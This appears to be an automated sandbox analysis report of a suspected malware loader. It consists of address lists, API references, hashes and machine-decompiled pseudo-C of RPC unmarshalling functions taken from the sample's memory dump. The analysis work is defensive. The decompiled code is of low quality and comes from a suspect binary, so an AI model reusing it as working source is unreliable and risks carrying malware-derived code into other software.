                                                                                              0x6f1d5757
                                                                                              0x6f1d576f
                                                                                              0x6f1d577b
                                                                                              0x6f1d5783
                                                                                              0x6f1d5786
                                                                                              0x6f1d578c
                                                                                              0x00000000
                                                                                              0x6f1d578c
                                                                                              0x6f1d5796

                                                                                              APIs
                                                                                              • _NdrComplexArrayBufferSize@12.RGSBZEOG(00000001,?,?), ref: 6F1D5704
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ArrayBufferComplexSize@12
                                                                                              • String ID: (%p,%p,%p)$invalid format type %x
                                                                                              • API String ID: 3462415225-814374321
                                                                                              • Opcode ID: c4ab28e6d682c5aa531e47f8e44533f63dd5ca71890c50459637c7e4cc8da1d2
                                                                                              • Instruction ID: 45be1c6d6f7ba067f6e7ef86e201149a8f5e5f4d9d0fe3e7d9b4d077e5242730
                                                                                              • Opcode Fuzzy Hash: c4ab28e6d682c5aa531e47f8e44533f63dd5ca71890c50459637c7e4cc8da1d2
                                                                                              • Instruction Fuzzy Hash: 9841D8B9A04209EFDB44CF48D490AAA7BB5FF88394F108159FD488B385D771EA91CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1DDCB4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 76%
                                                                                              			E6F1DDCB4(void* __ebx, void* __edi, void* __esi) {
				signed short _t55;
				intOrPtr _t57;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				void* _t103;
				void* _t105;
				void* _t109;
				void* _t110;

				 *(_t103 - 1) = ( *( *((intOrPtr*)(_t103 + 0x14)) + (1 << 0)) & 0x000000ff) + 1;
				 *((intOrPtr*)(_t103 + 0x14)) = E6F1DA440( *(_t103 + 0xc),  *((intOrPtr*)(_t103 + 0x14)) + 4);
				 *((intOrPtr*)(_t103 + 0x14)) = E6F1DA540( *(_t103 + 0xc),  *(_t103 + 0xc),  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c)));
				_t55 =  *(_t103 + 0xc);
				0x6f1d0000(_t55,  *((intOrPtr*)(_t103 + 0x14)));
				 *(_t103 - 8) = _t55;
				_t92 =  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c));
				_t57 = E6F1DAEC0( *(_t103 - 8) & 0x0000ffff,  *((intOrPtr*)( *(_t103 + 0xc) + 0x3c)));
				_t109 = _t105 + 0x24;
				 *((intOrPtr*)(_t103 - 0x14)) = _t57;
				_t112 =  *(_t103 + 0x20) & 0x000000ff;
				if(( *(_t103 + 0x20) & 0x000000ff) == 0) {
					_push(0xab4);
					E6F1DFA34(__ebx, _t92, __edi, __esi, _t112, L"fUnmarshall", L"C:\\xampp\\htdocs\\Loct\\0f112985b53f4edb9cf175c98caa4d9d\\Loader\\Project4\\Project4\\Source.c");
					_t109 = _t109 + 0xc;
				}
				if(( *(_t103 + 0x18) & 0x000000ff) == 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10)))) == 0) {
					 *(_t103 + 0x18) = 1;
				}
				if(( *(_t103 + 0x18) & 0x000000ff) != 0) {
					_t69 = E6F1DA3B0( *(_t103 + 0xc),  *(_t103 + 0xc),  *((intOrPtr*)(_t103 - 0x14)));
					_t109 = _t109 + 8;
					 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10)))) = _t69;
				}
				E6F1D73D0( *(_t103 + 0xc) + 4,  *(_t103 + 0xc) + 4,  *(_t103 - 1) & 0x000000ff);
				_t110 = _t109 + 8;
				 *((intOrPtr*)(_t103 - 0x10)) =  *((intOrPtr*)( *(_t103 + 0xc) + 4));
				 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10))));
				 *((intOrPtr*)(_t103 - 0x28)) =  *((intOrPtr*)( *(_t103 + 0xc) + 0x44));
				 *((intOrPtr*)(_t103 - 0x1c)) = 0;
				while( *((intOrPtr*)(_t103 - 0x1c)) <  *((intOrPtr*)(_t103 - 0x28))) {
					_t67 = E6F1D9560( *(_t103 + 0xc),  *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0x14)), 0,  *(_t103 + 0x18) & 0x000000ff);
					_t110 = _t110 + 0x14;
					 *((intOrPtr*)(_t103 - 0x20)) = _t67;
					 *((intOrPtr*)(_t103 - 0x1c)) =  *((intOrPtr*)(_t103 - 0x1c)) + 1;
				}
				_t65 =  *((intOrPtr*)( *(_t103 + 0xc) + 4)) -  *((intOrPtr*)(_t103 - 0x10));
				return _t65;
			}












                                                                                              0x6f1ddcc6
                                                                                              0x6f1ddcdc
                                                                                              0x6f1ddcf6
                                                                                              0x6f1ddcfd
                                                                                              0x6f1ddd01
                                                                                              0x6f1ddd09
                                                                                              0x6f1ddd10
                                                                                              0x6f1ddd19
                                                                                              0x6f1ddd1e
                                                                                              0x6f1ddd21
                                                                                              0x6f1ddd28
                                                                                              0x6f1ddd2a
                                                                                              0x6f1ddd2c
                                                                                              0x6f1ddd3b
                                                                                              0x6f1ddd40
                                                                                              0x6f1ddd40
                                                                                              0x6f1ddd49
                                                                                              0x6f1ddd53
                                                                                              0x6f1ddd53
                                                                                              0x6f1ddd5d
                                                                                              0x6f1ddd67
                                                                                              0x6f1ddd6c
                                                                                              0x6f1ddd72
                                                                                              0x6f1ddd72
                                                                                              0x6f1ddd80
                                                                                              0x6f1ddd85
                                                                                              0x6f1ddd8e
                                                                                              0x6f1ddd96
                                                                                              0x6f1ddd9f
                                                                                              0x6f1ddda2
                                                                                              0x6f1dddb4
                                                                                              0x6f1dddcf
                                                                                              0x6f1dddd4
                                                                                              0x6f1dddd7
                                                                                              0x6f1dddb1
                                                                                              0x6f1dddb1
                                                                                              0x6f1ddde2
                                                                                              0x6f1dde07

                                                                                              APIs
                                                                                              • __wassert.LIBCMT ref: 6F1DDD3B
                                                                                                • Part of subcall function 6F1DFA34: GetModuleHandleExW.KERNEL32(00000006,?,?), ref: 6F1DFAF9
                                                                                                • Part of subcall function 6F1DFA34: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6F1DFB25
                                                                                              Strings
                                                                                              • C:\xampp\htdocs\Loct\0f112985b53f4edb9cf175c98caa4d9d\Loader\Project4\Project4\Source.c, xrefs: 6F1DDD31
                                                                                              • fUnmarshall, xrefs: 6F1DDD36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Module$FileHandleName__wassert
                                                                                              • String ID: C:\xampp\htdocs\Loct\0f112985b53f4edb9cf175c98caa4d9d\Loader\Project4\Project4\Source.c$fUnmarshall
                                                                                              • API String ID: 1832359313-3937532760
                                                                                              • Opcode ID: a1346543a665db19d442750cdfb2106e942137e6b249c59e48aff77c25b1ff44
                                                                                              • Instruction ID: 7a9c455b8c71d21ad1746b57f57fcd74f0eef257afdd04cfa074c6723c09063f
                                                                                              • Opcode Fuzzy Hash: a1346543a665db19d442750cdfb2106e942137e6b249c59e48aff77c25b1ff44
                                                                                              • Instruction Fuzzy Hash: EA4153B5A00249AFCF04CF68D850A9E7BB5AF59348F148159F919AB381D335EA21CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D34D0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 64%
                                                                                              			E6F1D34D0(void* __eflags, intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _t67;
				void* _t100;
				void* _t102;
				void* _t103;

				_v12 = _a12[2] & 0x0000ffff;
				0x6f1d0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				E6F1D73D0(_a12, _a4 + 4, (_a12[1] & 0x000000ff) + 1);
				_t102 = _t100 + 0x1c;
				_t71 = _a16 & 0x000000ff;
				if((_a16 & 0x000000ff) == 0) {
					if(( *(_a4 + 0x20) & 0x000000ff) == 0 &&  *_a8 == 0) {
						 *_a8 =  *((intOrPtr*)(_a4 + 4));
					}
				} else {
					_t67 = E6F1DA3B0(_t71, _a4, _v12);
					_t102 = _t102 + 8;
					 *_a8 = _t67;
				}
				 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
				_v8 =  *((intOrPtr*)(_a4 + 0x10));
				E6F1DAF00(_a4, _v12);
				_t103 = _t102 + 8;
				if(( *_a12 & 0x000000ff) == 0x16) {
					E6F1DC2B0(_a4, _v8,  *_a8,  &(_a12[4]), _a16 & 0x000000ff);
					_t103 = _t103 + 0x14;
				}
				0x6f1d0000("copying %p to %p\n", _v8,  *_a8);
				if( *_a8 != _v8) {
					E6F1E00E0( *_a8, _v8, _v12);
				}
				return 0;
			}









                                                                                              0x6f1d34dd
                                                                                              0x6f1d34f6
                                                                                              0x6f1d3518
                                                                                              0x6f1d351d
                                                                                              0x6f1d3520
                                                                                              0x6f1d3526
                                                                                              0x6f1d3548
                                                                                              0x6f1d355b
                                                                                              0x6f1d355b
                                                                                              0x6f1d3528
                                                                                              0x6f1d3530
                                                                                              0x6f1d3535
                                                                                              0x6f1d353b
                                                                                              0x6f1d353b
                                                                                              0x6f1d3566
                                                                                              0x6f1d356f
                                                                                              0x6f1d357a
                                                                                              0x6f1d357f
                                                                                              0x6f1d3594
                                                                                              0x6f1d35b0
                                                                                              0x6f1d35b5
                                                                                              0x6f1d35b5
                                                                                              0x6f1d35c7
                                                                                              0x6f1d35d7
                                                                                              0x6f1d35e7
                                                                                              0x6f1d35ec
                                                                                              0x6f1d35f4

                                                                                              APIs
                                                                                              • _memmove.LIBCMT ref: 6F1D35E7
                                                                                                • Part of subcall function 6F1DA3B0: _memset.LIBCMT ref: 6F1DA3CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memmove_memset
                                                                                              • String ID: (%p,%p,%p,%d)$copying %p to %p
                                                                                              • API String ID: 3555123492-1064448161
                                                                                              • Opcode ID: 5f6ec411a51042b50059c325514bc1ecc2020d0159bf5aeb3f04058c3d1f0d4f
                                                                                              • Instruction ID: 27b270700e478237dcc8b44cd2ca25d364e270baff021451cafca761454811cb
                                                                                              • Opcode Fuzzy Hash: 5f6ec411a51042b50059c325514bc1ecc2020d0159bf5aeb3f04058c3d1f0d4f
                                                                                              • Instruction Fuzzy Hash: 0C413EB9604248ABCB04CF98D891DAE7BB6EF89344F10C159FC599B345D731FA61CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D4580, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 53%
                                                                                              			E6F1D4580(void* __eflags, signed int _a4, void* _a8, signed short* _a12, signed int _a16) {
				signed int _v5;
				signed char _v6;
				signed int _v12;
				intOrPtr _v16;
				char _v20;
				void* _t95;
				void* _t99;

				0x6f1d0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_a12 =  &(_a12[0]);
				_v6 =  *_a12 & 0xf;
				_v5 = ( *_a12 & 0xf0) >> 4;
				_a12 =  &(_a12[0]);
				E6F1D73D0(_v5 & 0x000000ff, _a4 + 4, _v5 & 0x000000ff);
				_v16 = E6F1DE930( *((intOrPtr*)(_a4 + 4)), _v6 & 0x000000ff,  *((intOrPtr*)(_a4 + 4)));
				0x6f1d0000("got switch value 0x%x\n", _v16);
				_t99 = _t95 + 0x2c;
				_v12 = ( *_a12 & 0x0000ffff) + (_v5 & 0x000000ff);
				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
					_a16 = 1;
				}
				if((_a16 & 0x000000ff) != 0) {
					 *_a8 =  *0x6f1d0000(_a4, _v12 & 0x0000ffff);
				}
				if((_a16 & 0x000000ff) != 0) {
					E6F1E0730( *_a8, 0, _v12 & 0x0000ffff);
					_t99 = _t99 + 0xc;
				}
				E6F1D77F0(_a4, _a8,  &_v6, 0);
				_v20 = (_v5 & 0x000000ff) +  *_a8;
				return E6F1DED20(_a4,  &_v20, _v16, _a12, 0);
			}










                                                                                              0x6f1d459c
                                                                                              0x6f1d45aa
                                                                                              0x6f1d45b6
                                                                                              0x6f1d45c8
                                                                                              0x6f1d45d1
                                                                                              0x6f1d45e0
                                                                                              0x6f1d45fc
                                                                                              0x6f1d4608
                                                                                              0x6f1d460d
                                                                                              0x6f1d461c
                                                                                              0x6f1d4626
                                                                                              0x6f1d4630
                                                                                              0x6f1d4630
                                                                                              0x6f1d463a
                                                                                              0x6f1d464e
                                                                                              0x6f1d464e
                                                                                              0x6f1d4656
                                                                                              0x6f1d4665
                                                                                              0x6f1d466a
                                                                                              0x6f1d466a
                                                                                              0x6f1d467b
                                                                                              0x6f1d4689
                                                                                              0x6f1d46a9

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: (%p, %p, %p, %d)$got switch value 0x%x
                                                                                              • API String ID: 2102423945-3216196450
                                                                                              • Opcode ID: ac1899642e74ec24c99006ed2853161e1568077c4c3c091b35a598ad6f0c86ad
                                                                                              • Instruction ID: d3801ca73d44efb1354eda691664c434026bd644696cbd12f55c995953ae08ce
                                                                                              • Opcode Fuzzy Hash: ac1899642e74ec24c99006ed2853161e1568077c4c3c091b35a598ad6f0c86ad
                                                                                              • Instruction Fuzzy Hash: 8541B3B5904298ABCB00CFA4D850ABF7BB5AF49305F04C189FD559B385D735E620CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D99D4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 21%
                                                                                              			E6F1D99D4() {
				void* _t246;
				void* _t248;
				void* _t250;

				L0:
				while(1) {
					L0:
					 *(_t246 + 0xc) =  *(_t246 + 0xc) + (( *(_t246 + 0x10))[1] & 0x000000ff);
					 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[2]);
					 *(_t246 - 8) =  &(( *(_t246 + 0x10))[ *( *(_t246 + 0x10))]);
					 *((intOrPtr*)(_t246 - 0x18)) = E6F1DE3A0( *((intOrPtr*)(_t246 + 8)),  *(_t246 - 8));
					0x6f1d0000("embedded complex (size=%d) => %p\n",  *((intOrPtr*)(_t246 - 0x18)),  *(_t246 + 0xc));
					_t250 = _t248 + 0x14;
					if(( *(_t246 + 0x18) & 0x000000ff) != 0) {
						E6F1E0730( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
					}
					 *((intOrPtr*)(_t246 - 0x14)) =  *((intOrPtr*)(0x6f1eb3d8 + ( *( *(_t246 - 8)) & 0x7f) * 4));
					if( *((intOrPtr*)(_t246 - 0x14)) == 0) {
						0x6f1d0000("no unmarshaller for embedded type %02x\n",  *( *(_t246 - 8)) & 0x000000ff);
						_t250 = _t250 + 8;
					} else {
						if(( *( *(_t246 - 8)) & 0x000000ff) != 0x2f) {
							 *((intOrPtr*)(_t246 - 0x14))( *((intOrPtr*)(_t246 + 8)), _t246 + 0xc,  *(_t246 - 8), 0);
						} else {
							 *((intOrPtr*)(_t246 - 0x14))( *((intOrPtr*)(_t246 + 8)),  *(_t246 + 0xc),  *(_t246 - 8), 0);
						}
					}
					 *(_t246 + 0xc) =  *(_t246 + 0xc) +  *((intOrPtr*)(_t246 - 0x18));
					 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[2]);
					L1:
					while(( *( *(_t246 + 0x10)) & 0x000000ff) != 0x5b) {
						 *(_t246 - 0xc) =  *( *(_t246 + 0x10)) & 0x000000ff;
						 *(_t246 - 0xc) =  *(_t246 - 0xc) - 1;
						if( *(_t246 - 0xc) > 0xb8) {
							L46:
							0x6f1d0000("unhandled format %d\n",  *( *(_t246 + 0x10)) & 0x000000ff);
							_t250 = _t250 + 8;
							L47:
							 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[1]);
							continue;
						}
						L3:
						_t23 =  *(_t246 - 0xc) + 0x6f1d9b24; // 0xcccccc0f
						switch( *((intOrPtr*)(( *_t23 & 0x000000ff) * 4 +  &M6F1D9AE0))) {
							case 0:
								L4:
								E6F1DAFA0( *((intOrPtr*)(_t246 + 8)),  *(_t246 + 0xc), 1);
								_push( *(_t246 + 0xc));
								_push( *( *(_t246 + 0xc)) & 0x0000ffff);
								_push("byte=%d => %p\n");
								0x6f1d0000();
								_t250 = _t250 + 0x18;
								 *(_t246 + 0xc) =  &(( *(_t246 + 0xc))[0]);
								goto L47;
							case 1:
								L5:
								__edx =  *(__ebp + 0xc);
								 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
								__ecx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__edx =  *(__ebp + 0xc);
								__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
								_push( *( *(__ebp + 0xc)) & 0x0000ffff);
								_push("short=%d => %p\n");
								0x6f1d0000();
								__esp = __esp + 0xc;
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 2;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 2:
								L9:
								__edx =  *(__ebp + 0xc);
								 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
								__ecx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__edx =  *(__ebp + 0xc);
								__eax =  *( *(__ebp + 0xc));
								_push( *( *(__ebp + 0xc)));
								_push("long=%d => %p\n");
								0x6f1d0000();
								__esp = __esp + 0xc;
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 3:
								L12:
								__eax =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 8);
								__eax = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
								__edx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__eax =  *(__ebp + 0xc);
								asm("cvtss2sd xmm0, [eax]");
								__esp = __esp - 8;
								asm("movsd [esp], xmm0");
								_push("float=%f => %p\n");
								0x6f1d0000();
								__esp = __esp + 0x10;
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 4:
								L13:
								__edx =  *(__ebp + 0xc);
								 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
								__ecx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__edx =  *(__ebp + 0xc);
								__eax =  *(__edx + 4);
								_push(__eax);
								__ecx =  *__edx;
								_push(__ecx);
								0x6f1d0000();
								__esp = __esp + 8;
								_push(__eax);
								_push("longlong=%s => %p\n");
								0x6f1d0000();
								__esp = __esp + 0xc;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
								goto L47;
							case 5:
								L14:
								__eax =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 8);
								__eax = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
								__edx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__eax =  *(__ebp + 0xc);
								__esp = __esp - 8;
								asm("movsd xmm0, [eax]");
								asm("movsd [esp], xmm0");
								_push("double=%f => %p\n");
								0x6f1d0000();
								__esp = __esp + 0x10;
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 8;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 6:
								L6:
								__edx = __ebp - 4;
								 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8), __ebp - 4, 2);
								__ecx =  *(__ebp - 4) & 0x0000ffff;
								__edx =  *(__ebp + 0xc);
								 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
								__eax =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__ecx =  *(__ebp + 0xc);
								__edx =  *( *(__ebp + 0xc));
								_push( *( *(__ebp + 0xc)));
								_push("enum16=%d => %p\n");
								0x6f1d0000();
								__esp = __esp + 0xc;
								__eax =  *(__ebp + 0xc);
								if( *( *(__ebp + 0xc)) > 0x7fff) {
									_push(0x6f5);
									__eax =  *0x6f1d0000();
								}
								L8:
								__ecx =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + 4;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 7:
								L15:
								 *(__ebp - 0x1c) = 0;
								__edx =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								_push("pointer => %p\n");
								0x6f1d0000();
								__esp = __esp + 8;
								__eax =  *(__ebp + 0x10);
								__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
								if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
									__edx =  *(__ebp + 0x10);
									 *(__ebp + 0x14) =  *(__ebp + 0x10);
								}
								__eax =  *(__ebp + 0x14);
								__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
								if(__ecx != 0x11) {
									 *(__ebp + 8) =  *(__ebp + 8) + 4;
									__eax = E6F1D73D0(__ecx,  *(__ebp + 8) + 4, 4);
								}
								__eax =  *(__ebp + 8);
								__ecx =  *(__eax + 4);
								 *(__ebp - 0x20) =  *(__eax + 4);
								__edx =  *(__ebp + 8);
								if( *( *(__ebp + 8) + 0x34) == 0) {
									__ecx =  *(__ebp + 0x14);
									__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
										 *(__ebp + 8) = E6F1DAF00( *(__ebp + 8), 4);
									}
								} else {
									__eax =  *(__ebp + 8);
									__ecx =  *(__ebp + 8);
									__edx =  *(__ecx + 0x34);
									 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
									__eax =  *(__ebp + 8);
									 *( *(__ebp + 8) + 0x34) = 0;
									 *(__ebp - 0x1c) = 1;
								}
								__ecx =  *(__ebp + 0x18) & 0x000000ff;
								__edx =  *(__ebp + 0x14);
								__eax =  *(__ebp + 0xc);
								__ecx =  *( *(__ebp + 0xc));
								__edx =  *(__ebp + 0xc);
								__eax =  *(__ebp - 0x20);
								__ecx =  *(__ebp + 8);
								__eax = E6F1DB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
								if( *(__ebp - 0x1c) == 0) {
									L29:
									__edx =  *(__ebp + 0x10);
									__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
										 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
										 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
									} else {
										__ecx =  *(__ebp + 0x14);
										__ecx =  *(__ebp + 0x14) + 4;
										 *(__ebp + 0x14) = __ecx;
									}
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									goto L47;
								} else {
									do {
										L24:
										__edx =  *(__ebp + 8);
										__eax =  *(__edx + 0x14);
										_push( *(__edx + 0x14));
										__ecx =  *(__ebp + 8);
										__edx =  *( *(__ebp + 8));
										__eax =  *(__ebp + 8);
										 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
										_push( *(__eax + 4) -  *(__edx + 8));
										_push("buffer=%d/%d\n");
										0x6f1d0000();
										__esp = __esp + 0xc;
										__edx =  *(__ebp + 8);
										__eax =  *( *(__ebp + 8));
										__ecx =  *(__eax + 8);
										__edx =  *(__ebp + 8);
										__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
										__eax =  *(__ebp + 8);
										if( *( *(__ebp + 8) + 4) > __ecx) {
											__ecx =  *(__ebp + 8);
											__edx =  *( *(__ebp + 8));
											__eax =  *(__edx + 8);
											__ecx =  *(__ebp + 8);
											__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
											__edx =  *(__ebp + 8);
											 *(__edx + 4) =  *(__edx + 4) - __eax;
											_push( *(__edx + 4) - __eax);
											_push("buffer overflow %d bytes\n");
											0x6f1d0000();
											__esp = __esp + 8;
										}
										__edx = 0;
									} while (0 != 0);
									__eax =  *(__ebp + 8);
									__ecx =  *(__ebp + 8);
									__edx =  *(__ecx + 4);
									 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
									__eax =  *(__ebp + 8);
									__ecx =  *(__ebp - 0x20);
									 *( *(__ebp + 8) + 4) = __ecx;
									__edx =  *(__ebp + 0x14);
									__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
										__ecx =  *(__ebp + 8);
										__eax = E6F1DAF00( *(__ebp + 8), 4);
									}
									goto L29;
								}
							case 8:
								L33:
								__ecx =  *(__ebp - 0x10);
								__edx = __ebp + 0xc;
								__eax = E6F1D7480(__ecx, __ebp + 0xc, __ecx, 2);
								goto L47;
							case 9:
								L34:
								__eax =  *(__ebp - 0x10);
								__ecx = __ebp + 0xc;
								__eax = E6F1D7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
								goto L47;
							case 0xa:
								L35:
								__edx =  *(__ebp - 0x10);
								__ebp + 0xc = E6F1D7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
								goto L47;
							case 0xb:
								L36:
								__ecx =  *(__ebp + 0x10);
								 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
								 *(__ebp + 0xc) = E6F1E0730( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
								__ecx =  *(__ebp + 0x10);
								__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
								__eax =  *(__ebp + 0xc);
								__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
								 *(__ebp + 0xc) = __ecx;
								goto L47;
							case 0xc:
								goto L0;
							case 0xd:
								L45:
								goto L47;
							case 0xe:
								L10:
								__edx = __ebp - 0x24;
								 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8), __ebp - 0x24, 4);
								__ecx =  *(__ebp + 0xc);
								__edx =  *(__ebp - 0x24);
								 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
								__eax =  *(__ebp + 0xc);
								_push( *(__ebp + 0xc));
								__ecx =  *(__ebp + 0xc);
								__edx =  *__ecx;
								_push( *__ecx);
								_push("int3264=%ld => %p\n");
